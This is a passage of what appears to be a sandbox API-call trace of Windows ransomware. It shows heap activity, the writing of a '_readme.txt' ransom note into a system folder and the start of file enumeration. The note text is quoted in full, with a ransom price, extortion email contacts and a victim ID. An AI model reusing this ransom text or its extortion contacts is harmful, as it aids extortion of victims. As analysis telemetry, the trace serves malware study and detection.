dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.438] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0183.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.438] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.438] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.438] PathFindFileNameW (pszPath="") returned="" [0183.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.438] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.439] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0183.439] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0183.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.439] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.439] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0183.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.439] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0183.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.440] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.440] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.440] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.441] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*" (normalized: "c:\\boot\\de-de\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.442] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.442] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, 